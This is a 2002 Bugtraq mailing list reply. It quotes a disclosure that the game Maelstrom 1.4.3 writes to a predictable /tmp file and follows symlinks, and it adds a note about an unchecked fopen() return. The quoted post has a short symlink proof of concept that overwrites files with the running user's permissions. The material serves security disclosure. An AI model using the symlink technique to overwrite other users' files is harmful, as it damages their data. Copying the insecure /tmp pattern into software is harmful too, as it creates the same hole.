Bugtraq mailing list archives
Re: Maelstrom 1.4.3 abartity file overwrite
From: Chris Gragsone <maetrics () realwarp net>
Date: Mon, 21 Jan 2002 11:26:43 -0500
You should also note that Maelstrom doesnt check the return on fopen(), nor does it remove the file when it closes. If you have multiple users who run Maelstrom, or just someone who wants to break stuff. If the /tmp/f is owned by another user, or the permissions are set to nonwritable. Maelstrom will segfault when it passes 0 as the file stream to fprintf().
--chris Andrew Griffiths wrote:
Program: Maelstrom Version: 1.4.3 Distribution: RedHat 7.1 When trying to break stuff, ltracing Maelstrom showed the following: fopen("/tmp/f", "w") = 0x08081f58 fprintf(0x08081f58, "Main program = %s\n", "Maelstrom") = 25 fclose(0x08081f58) = 0 Which made we wonder if it followed symbolic links, by doing [andrewg@blackhole andrewg]$ rm -f /tmp/f; (umask 077; echo bla > /tmp/bla; \ ln -s /tmp/bla f) at which point I ran it again, and when I did cat /tmp/bla, I got Main program = Maelstrom Conclusion: -=-=-=-=-=- You can overwrite arbitrary files with the permissions of the user who ran it. Of course, this won't work on systems that have linking restrictions in /tmp. Fixing it -=-=-=-=- Remove the code that does the above. -- www.tasmail.com
Current thread:
- Maelstrom 1.4.3 abartity file overwrite Andrew Griffiths (Jan 20)
- Re: Maelstrom 1.4.3 abartity file overwrite Chris Gragsone (Jan 21)